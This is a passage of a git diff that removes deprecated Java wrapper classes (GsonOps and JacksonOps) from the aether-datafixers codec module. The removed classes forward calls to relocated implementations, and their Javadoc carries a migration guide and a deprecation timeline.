- * - * @param value the float value to wrap - * @return a new {@link JsonPrimitive} containing the float - */ - @NotNull - @Override - public JsonElement createFloat(final float value) { - return this.baseOps.createFloat(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given double value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createDouble(double)} method.

- * - * @param value the double value to wrap - * @return a new {@link JsonPrimitive} containing the double - */ - @NotNull - @Override - public JsonElement createDouble(final double value) { - return this.baseOps.createDouble(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given byte value. - * Since JSON has no distinct byte type, the value is stored as a number. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createByte(byte)} method.

- * - * @param value the byte value to wrap - * @return a new {@link JsonPrimitive} containing the byte as a number - */ - @NotNull - @Override - public JsonElement createByte(final byte value) { - return this.baseOps.createByte(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given short value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createShort(short)} method.

- * - * @param value the short value to wrap - * @return a new {@link JsonPrimitive} containing the short - */ - @NotNull - @Override - public JsonElement createShort(final short value) { - return this.baseOps.createShort(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON boolean primitive from the given boolean value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createBoolean(boolean)} method.

- * - * @param value the boolean value to wrap - * @return a new {@link JsonPrimitive} containing the boolean - */ - @NotNull - @Override - public JsonElement createBoolean(final boolean value) { - return this.baseOps.createBoolean(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given {@link Number} value. - * The specific numeric type is preserved in the underlying JSON representation. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createNumeric(Number)} method.

- * - * @param value the number value to wrap; must not be {@code null} - * @return a new {@link JsonPrimitive} containing the number - */ - @NotNull - @Override - public JsonElement createNumeric(@NotNull final Number value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createNumeric(value); - } - - // ==================== Primitive Reading ==================== - - /** - * {@inheritDoc} - * - *

Extracts the string value from a JSON element. The element must be a - * {@link JsonPrimitive} containing a string value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getStringValue(JsonElement)} method.

- * - * @param input the JSON element to extract the string from; must not be {@code null} - * @return a {@link DataResult} containing the string value on success, - * or an error if the element is not a string primitive - */ - @NotNull - @Override - public DataResult getStringValue(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getStringValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the numeric value from a JSON element. The element must be a - * {@link JsonPrimitive} containing a numeric value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getNumberValue(JsonElement)} method.

- * - * @param input the JSON element to extract the number from; must not be {@code null} - * @return a {@link DataResult} containing the {@link Number} value on success, - * or an error if the element is not a numeric primitive - */ - @NotNull - @Override - public DataResult getNumberValue(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getNumberValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the boolean value from a JSON element. The element must be a - * {@link JsonPrimitive} containing a boolean value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getBooleanValue(JsonElement)} method.

- * - * @param input the JSON element to extract the boolean from; must not be {@code null} - * @return a {@link DataResult} containing the boolean value on success, - * or an error if the element is not a boolean primitive - */ - @NotNull - @Override - public DataResult getBooleanValue(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getBooleanValue(input); - } - - // ==================== List Operations ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON array from a stream of JSON elements. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createList(Stream)} method.

- * - * @param values the stream of JSON elements to include in the array; must not be {@code null} - * @return a new {@link JsonArray} containing all elements from the stream - */ - @NotNull - @Override - public JsonElement createList(@NotNull final Stream values) { - Preconditions.checkNotNull(values, "values must not be null"); - return this.baseOps.createList(values); - } - - /** - * {@inheritDoc} - * - *

Extracts the elements of a JSON array as a stream. The input must be a - * {@link JsonArray}. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getList(JsonElement)} method.

- * - * @param input the JSON element to extract list elements from; must not be {@code null} - * @return a {@link DataResult} containing a stream of the array elements on success, - * or an error if the input is not a JSON array - */ - @NotNull - @Override - public DataResult> getList(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getList(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON array by appending a value to an existing array. - * The original array is not modified; a deep copy is created. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToList(JsonElement, JsonElement)} method.

- * - * @param list the existing JSON array to append to; must not be {@code null} - * @param value the JSON element to append; must not be {@code null} - * @return a {@link DataResult} containing the new array with the appended value on success, - * or an error if the list is not a JSON array - */ - @NotNull - @Override - public DataResult mergeToList(@NotNull final JsonElement list, @NotNull final JsonElement value) { - Preconditions.checkNotNull(list, "list must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToList(list, value); - } - - // ==================== Map Operations ==================== - - /** - * {@inheritDoc} - * - *

Retrieves the value associated with a key from a JSON object. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#get(JsonElement, String)} method.

- * - * @param value the JSON object to retrieve from; must not be {@code null} - * @param key the key to look up; must not be {@code null} - * @return the JSON element associated with the key, or {@code null} if not present - * or if the input is not a JSON object - */ - @Override - public @Nullable JsonElement get(@NotNull final JsonElement value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.get(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field set to the specified value. - * If the input is a JSON object, a deep copy is created with the field updated. - * If the input is not a JSON object, a new object is created containing only the specified field. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#set(JsonElement, String, JsonElement)} method.

- * - * @param value the JSON element to modify; must not be {@code null} - * @param key the key for the field to set; must not be {@code null} - * @param newValue the value to associate with the key; must not be {@code null} - * @return a new {@link JsonObject} with the field set to the specified value - */ - @NotNull - @Override - public JsonElement set(@NotNull final JsonElement value, @NotNull final String key, @NotNull final JsonElement newValue) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - Preconditions.checkNotNull(newValue, "newValue must not be null"); - return this.baseOps.set(value, key, newValue); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field removed. - * A deep copy of the input object is created without the specified field. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#remove(JsonElement, String)} method.

- * - * @param value the JSON object to modify; must not be {@code null} - * @param key the key of the field to remove; must not be {@code null} - * @return a new {@link JsonObject} without the specified field - */ - @NotNull - @Override - public JsonElement remove(@NotNull final JsonElement value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.remove(value, key); - } - - /** - * {@inheritDoc} - * - *

Checks whether a JSON object contains a field with the specified key. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#has(JsonElement, String)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @param key the key to look for; must not be {@code null} - * @return {@code true} if the value is a {@link JsonObject} and contains the specified key, - * {@code false} otherwise - */ - @Override - public boolean has(@NotNull final JsonElement value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.has(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON object from a stream of key-value pairs. - * Keys must be JSON string primitives; non-string keys are skipped. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createMap(Stream)} method.

- * - * @param entries the stream of key-value pairs; must not be {@code null} - * @return a new {@link JsonObject} containing all valid entries from the stream - */ - @NotNull - @Override - public JsonElement createMap(@NotNull final Stream> entries) { - Preconditions.checkNotNull(entries, "entries must not be null"); - return this.baseOps.createMap(entries); - } - - /** - * {@inheritDoc} - * - *

Extracts the entries of a JSON object as a stream of key-value pairs. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getMapEntries(JsonElement)} method.

- * - * @param input the JSON element to extract entries from; must not be {@code null} - * @return a {@link DataResult} containing a stream of key-value pairs on success, - * or an error if the input is not a JSON object - */ - @NotNull - @Override - public DataResult>> getMapEntries(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getMapEntries(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object by adding a key-value pair to an existing map. - * A deep copy of the input map is created with the new entry added. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement, JsonElement)} method.

- * - * @param map the existing JSON object; must not be {@code null} - * @param key the key for the new entry (must be a JSON string); must not be {@code null} - * @param value the value for the new entry; must not be {@code null} - * @return a {@link DataResult} containing the new object with the added entry on success, - * or an error if the map is not a JSON object or the key is not a string - */ - @NotNull - @Override - public DataResult mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement key, @NotNull final JsonElement value) { - Preconditions.checkNotNull(map, "map must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToMap(map, key, value); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object by merging two maps together. - * A deep copy of the first map is created, and all entries from the second map are added. - * Entries in the second map override entries with the same key in the first map. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement)} method.

- * - * @param map the base JSON object; must not be {@code null} - * @param other the JSON object to merge from; must not be {@code null} - * @return a {@link DataResult} containing the merged object on success, - * or an error if either argument is not a JSON object - */ - @NotNull - @Override - public DataResult mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement other) { - Preconditions.checkNotNull(map, "map must not be null"); - Preconditions.checkNotNull(other, "other must not be null"); - return this.baseOps.mergeToMap(map, other); - } - - // ==================== Conversion ==================== - - /** - * {@inheritDoc} - * - *

Converts data from another {@link DynamicOps} format to Gson's {@link JsonElement}. - * Recursively converts primitives, lists, and maps to their Gson equivalents. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#convertTo(DynamicOps, Object)} method.

- * - * @param the type parameter of the target format - * @param ops the target {@link DynamicOps} implementation; must not be {@code null} - * @param input the data to convert in the source format; must not be {@code null} - * @return the converted data as a Gson {@link JsonElement} - */ - @NotNull - @Override - public JsonElement convertTo(@NotNull final DynamicOps ops, @NotNull final U input) { - Preconditions.checkNotNull(ops, "ops must not be null"); - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.convertTo(ops, input); - } - - /** - * Returns a string representation of this deprecated wrapper. - * - *

The returned string clearly indicates that this is a deprecated wrapper - * class and suggests using the new implementation instead.

- * - * @return a descriptive string indicating deprecated status and the recommended alternative - */ - @Override - public String toString() { - return "GsonOps (deprecated, use de.splatgames.aether.datafixers.codec.json.gson.GsonOps)"; - } -} diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java deleted file mode 100644 index c937d27..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java +++ /dev/null @@ -1,110 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. - */ - -/** - * DEPRECATED: Legacy package for Gson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps} - * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0. - * - *

This package contains the original {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class - * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their - * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.gson} package.

- * - *

Migration Guide

- *

To migrate from this deprecated package to the new package structure:

- * - *

Import Changes

- *
{@code
- * // Old import (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.gson.GsonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
- * }
- * - *

Code Changes

- *

No code changes are required beyond updating imports. The API is identical:

- *
{@code
- * // This code works with both old and new imports
- * GsonOps ops = GsonOps.INSTANCE;
- * Dynamic dynamic = new Dynamic<>(ops, jsonElement);
- * }
- * - *

Deprecation Timeline

- * - * - * - * - * - * - *
Deprecation and Removal Schedule
VersionStatusAction Required
0.4.0DeprecatedUpdate imports to new package; old code continues to work
0.5.0DeprecatedWarnings during compilation; functionality unchanged
1.0.0RemovedPackage deleted; migration required before upgrade
- * - *

Why This Change?

- *

The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:

- *
    - *
  • Format-Based Organization: All JSON implementations are now grouped under - * {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.
  • - *
  • Library-Based Subpackages: Each format has subpackages for different - * libraries (e.g., {@code json.gson}, {@code json.jackson})
  • - *
  • Consistent Naming: The new structure makes it easier to find and choose - * the right implementation for your needs
  • - *
- * - *

New Package Structure

- *
- * de.splatgames.aether.datafixers.codec
- * ├── json
- * │   ├── gson/GsonOps.java         (new location)
- * │   └── jackson/JacksonJsonOps.java
- * ├── yaml
- * │   ├── jackson/JacksonYamlOps.java
- * │   └── snakeyaml/SnakeYamlOps.java
- * ├── toml
- * │   └── jackson/JacksonTomlOps.java
- * └── xml
- *     └── jackson/JacksonXmlOps.java
- * 
- * - *

Delegation Pattern

- *

The deprecated {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class uses the - * delegation pattern to forward all method calls to the new - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} implementation. This ensures:

- *
    - *
  • Identical behavior between deprecated and new implementations
  • - *
  • Bug fixes applied to the new implementation automatically benefit deprecated users
  • - *
  • No performance overhead beyond a single method delegation
  • - *
- * - *

Thread Safety

- *

All classes in this deprecated package maintain the same thread-safety guarantees as their - * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.gson.GsonOps#INSTANCE} - * can be safely shared across multiple threads.

- * - * @author Erik Pförtner - * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps - * @see de.splatgames.aether.datafixers.codec.json - * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps - * @since 0.1.0 - * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.gson} - * instead. This package will be removed in version 1.0.0. - */ -@Deprecated(since = "0.4.0", forRemoval = true) -package de.splatgames.aether.datafixers.codec.gson; diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java deleted file mode 100644 index 886fdaf..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java +++ /dev/null @@ -1,767 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. - */ - -package de.splatgames.aether.datafixers.codec.jackson; - -import com.fasterxml.jackson.databind.JsonNode; -import com.fasterxml.jackson.databind.ObjectMapper; -import com.fasterxml.jackson.databind.node.ArrayNode; -import com.fasterxml.jackson.databind.node.NullNode; -import com.fasterxml.jackson.databind.node.ObjectNode; -import com.google.common.base.Preconditions; -import de.splatgames.aether.datafixers.api.dynamic.DynamicOps; -import de.splatgames.aether.datafixers.api.result.DataResult; -import de.splatgames.aether.datafixers.api.util.Pair; -import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; -import org.jetbrains.annotations.NotNull; -import org.jetbrains.annotations.Nullable; - -import java.util.stream.Stream; - -/** - * Backwards-compatibility wrapper for {@link JacksonJsonOps}. - * - *

This class provides API compatibility for code written against the pre-0.4.0 package structure. - * It delegates all operations to the new {@link JacksonJsonOps} implementation in the reorganized - * package hierarchy.

- * - *

Migration Guide

- *

To migrate to the new API, update your imports and class references:

- *
{@code
- * // Old import (deprecated)
- * import de.splatgames.aether.datafixers.codec.jackson.JacksonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
- *
- * // Old usage (deprecated)
- * JacksonOps ops = JacksonOps.INSTANCE;
- * JacksonOps customOps = new JacksonOps(customMapper);
- *
- * // New usage (recommended)
- * JacksonJsonOps ops = JacksonJsonOps.INSTANCE;
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * }
- * - *

Removal Timeline

- *

This class is scheduled for removal in version 1.0.0. All functionality remains - * fully operational until removal, but users should migrate to the new package structure - * and class name at their earliest convenience.

- * - *

Delegation Pattern

- *

This wrapper implements the delegation pattern, forwarding all method calls to the - * underlying {@link JacksonJsonOps} instance. This ensures identical behavior between - * the deprecated and new implementations.

- * - *

Thread Safety

- *

This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared - * across multiple threads, as the underlying implementation is also thread-safe. - * Custom instances created with a custom {@link ObjectMapper} are thread-safe if - * the provided mapper is thread-safe.

- * - * @author Erik Pförtner - * @see JacksonJsonOps - * @see DynamicOps - * @since 0.1.0 - * @deprecated Since 0.4.0. Use {@link JacksonJsonOps} from the {@code codec.json.jackson} - * package instead. This class will be removed in version 1.0.0 as part of - * the package reorganization. - */ -@Deprecated(forRemoval = true, since = "0.4.0") -public class JacksonOps implements DynamicOps { - - /** - * The singleton instance of the deprecated {@code JacksonOps} wrapper. - * - *

This instance wraps {@link JacksonJsonOps#INSTANCE} and provides full backwards - * compatibility. It uses a default {@link ObjectMapper} with standard configuration. - * The instance is thread-safe and can be shared across the entire application.

- * - *

Migration

- *

Replace usages with:

- *
{@code
-     * // Old usage (deprecated)
-     * JacksonOps.INSTANCE
-     *
-     * // New usage (recommended)
-     * JacksonJsonOps.INSTANCE
-     * }
- * - * @deprecated Use {@link JacksonJsonOps#INSTANCE} instead. - */ - @Deprecated(forRemoval = true, since = "0.4.0") - public static final JacksonOps INSTANCE = new JacksonOps(JacksonJsonOps.INSTANCE); - - /** - * The underlying {@link JacksonJsonOps} instance to which all operations are delegated. - * - *

This field holds the actual implementation that performs all DynamicOps operations. - * The wrapper simply forwards all method calls to this instance, ensuring behavioral - * equivalence between the deprecated and new implementations.

- */ - private final JacksonJsonOps baseOps; - - /** - * Creates a new deprecated {@code JacksonOps} wrapper delegating to the specified base implementation. - * - *

This constructor allows wrapping any {@link JacksonJsonOps} instance, enabling use - * of custom configurations while maintaining backwards compatibility.

- * - *

Usage

- *
{@code
-     * // Typically use the singleton instead
-     * JacksonOps ops = JacksonOps.INSTANCE;
-     *
-     * // Or wrap a custom JacksonJsonOps instance
-     * JacksonJsonOps customJsonOps = new JacksonJsonOps(customMapper);
-     * JacksonOps customOps = new JacksonOps(customJsonOps);
-     * }
- * - * @param baseOps the base {@link JacksonJsonOps} instance to delegate all operations to; - * must not be {@code null} - * @deprecated Use {@link JacksonJsonOps} directly instead. - */ - @Deprecated(forRemoval = true, since = "0.4.0") - private JacksonOps(@NotNull final JacksonJsonOps baseOps) { - Preconditions.checkNotNull(baseOps, "baseOps must not be null"); - this.baseOps = baseOps; - } - - /** - * Creates a new deprecated {@code JacksonOps} with the specified {@link ObjectMapper}. - * - *

This constructor provides backwards compatibility for code that creates custom - * {@code JacksonOps} instances with a specific mapper configuration.

- * - *

Usage

- *
{@code
-     * // Old usage (deprecated)
-     * ObjectMapper customMapper = new ObjectMapper()
-     *     .configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
-     * JacksonOps customOps = new JacksonOps(customMapper);
-     *
-     * // New usage (recommended)
-     * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
-     * }
- * - * @param mapper the {@link ObjectMapper} to use for JSON operations; must not be {@code null} - * @deprecated Use {@link JacksonJsonOps#JacksonJsonOps(ObjectMapper)} instead. - */ - @Deprecated(forRemoval = true, since = "0.4.0") - public JacksonOps(@NotNull final ObjectMapper mapper) { - Preconditions.checkNotNull(mapper, "mapper must not be null"); - this.baseOps = new JacksonJsonOps(mapper); - } - - /** - * Returns the {@link ObjectMapper} used by this instance. - * - *

This method provides access to the underlying Jackson mapper, which can be - * useful for advanced configuration or direct JSON serialization/deserialization.

- * - *

Migration

- *
{@code
-     * // Old usage (deprecated)
-     * ObjectMapper mapper = jacksonOps.mapper();
-     *
-     * // New usage (recommended)
-     * ObjectMapper mapper = jacksonJsonOps.mapper();
-     * }
- * - * @return the {@link ObjectMapper} used by the underlying {@link JacksonJsonOps} instance - * @deprecated Use {@link JacksonJsonOps#mapper()} instead. - */ - @Deprecated(forRemoval = true, since = "0.4.0") - public ObjectMapper mapper() { - return this.baseOps.mapper(); - } - - // ==================== Empty/Null Values ==================== - - /** - * {@inheritDoc} - * - *

Returns the canonical empty/null representation for Jackson JSON data, - * which is {@link NullNode#getInstance()}. This delegates to the underlying - * {@link JacksonJsonOps#empty()} method.

- * - * @return {@link NullNode#getInstance()} representing the absence of a value - */ - @NotNull - @Override - public JsonNode empty() { - return this.baseOps.empty(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON object ({@code {}}). This delegates to the underlying - * {@link JacksonJsonOps#emptyMap()} method.

- * - * @return a new empty {@link ObjectNode} instance - */ - @NotNull - @Override - public JsonNode emptyMap() { - return this.baseOps.emptyMap(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON array ({@code []}). This delegates to the underlying - * {@link JacksonJsonOps#emptyList()} method.

- * - * @return a new empty {@link ArrayNode} instance - */ - @NotNull - @Override - public JsonNode emptyList() { - return this.baseOps.emptyList(); - } - - // ==================== Type Checking ==================== - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a map/object structure. - * This delegates to the underlying {@link JacksonJsonOps#isMap(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is an {@link ObjectNode}, {@code false} otherwise - */ - @Override - public boolean isMap(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isMap(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a list/array structure. - * This delegates to the underlying {@link JacksonJsonOps#isList(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is an {@link ArrayNode}, {@code false} otherwise - */ - @Override - public boolean isList(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isList(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a text/string node. - * This delegates to the underlying {@link JacksonJsonOps#isString(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is a text node, {@code false} otherwise - */ - @Override - public boolean isString(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isString(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a numeric node. - * This delegates to the underlying {@link JacksonJsonOps#isNumber(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is a numeric node, {@code false} otherwise - */ - @Override - public boolean isNumber(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isNumber(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON node is a boolean node. - * This delegates to the underlying {@link JacksonJsonOps#isBoolean(JsonNode)} method.

- * - * @param value the JSON node to check; must not be {@code null} - * @return {@code true} if the value is a boolean node, {@code false} otherwise - */ - @Override - public boolean isBoolean(@NotNull final JsonNode value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isBoolean(value); - } - - // ==================== Primitive Creation ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON text node from the given string value. - * This delegates to the underlying {@link JacksonJsonOps#createString(String)} method.

- * - * @param value the string value to wrap; must not be {@code null} - * @return a new text node containing the string - */ - @NotNull - @Override - public JsonNode createString(@NotNull final String value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createString(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given integer value. - * This delegates to the underlying {@link JacksonJsonOps#createInt(int)} method.

- * - * @param value the integer value to wrap - * @return a new int node containing the integer - */ - @NotNull - @Override - public JsonNode createInt(final int value) { - return this.baseOps.createInt(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given long value. - * This delegates to the underlying {@link JacksonJsonOps#createLong(long)} method.

- * - * @param value the long value to wrap - * @return a new long node containing the long - */ - @NotNull - @Override - public JsonNode createLong(final long value) { - return this.baseOps.createLong(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given float value. - * This delegates to the underlying {@link JacksonJsonOps#createFloat(float)} method.

- * - * @param value the float value to wrap - * @return a new float node containing the float - */ - @NotNull - @Override - public JsonNode createFloat(final float value) { - return this.baseOps.createFloat(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given double value. - * This delegates to the underlying {@link JacksonJsonOps#createDouble(double)} method.

- * - * @param value the double value to wrap - * @return a new double node containing the double - */ - @NotNull - @Override - public JsonNode createDouble(final double value) { - return this.baseOps.createDouble(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given byte value. - * Since JSON has no distinct byte type, the value is stored as a short node. - * This delegates to the underlying {@link JacksonJsonOps#createByte(byte)} method.

- * - * @param value the byte value to wrap - * @return a new short node containing the byte value - */ - @NotNull - @Override - public JsonNode createByte(final byte value) { - return this.baseOps.createByte(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given short value. - * This delegates to the underlying {@link JacksonJsonOps#createShort(short)} method.

- * - * @param value the short value to wrap - * @return a new short node containing the short - */ - @NotNull - @Override - public JsonNode createShort(final short value) { - return this.baseOps.createShort(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON boolean node from the given boolean value. - * This delegates to the underlying {@link JacksonJsonOps#createBoolean(boolean)} method.

- * - * @param value the boolean value to wrap - * @return a new boolean node containing the boolean - */ - @NotNull - @Override - public JsonNode createBoolean(final boolean value) { - return this.baseOps.createBoolean(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric node from the given {@link Number} value. - * The specific numeric type is preserved in the underlying JSON representation. - * This delegates to the underlying {@link JacksonJsonOps#createNumeric(Number)} method.

- * - * @param value the number value to wrap; must not be {@code null} - * @return a new numeric node containing the number - */ - @NotNull - @Override - public JsonNode createNumeric(@NotNull final Number value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createNumeric(value); - } - - // ==================== Primitive Reading ==================== - - /** - * {@inheritDoc} - * - *

Extracts the string value from a JSON node. The node must be a text node. - * This delegates to the underlying {@link JacksonJsonOps#getStringValue(JsonNode)} method.

- * - * @param input the JSON node to extract the string from; must not be {@code null} - * @return a {@link DataResult} containing the string value on success, - * or an error if the node is not a text node - */ - @NotNull - @Override - public DataResult getStringValue(@NotNull final JsonNode input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getStringValue(input); - } - - /** - * {@inheritDoc} - * - *

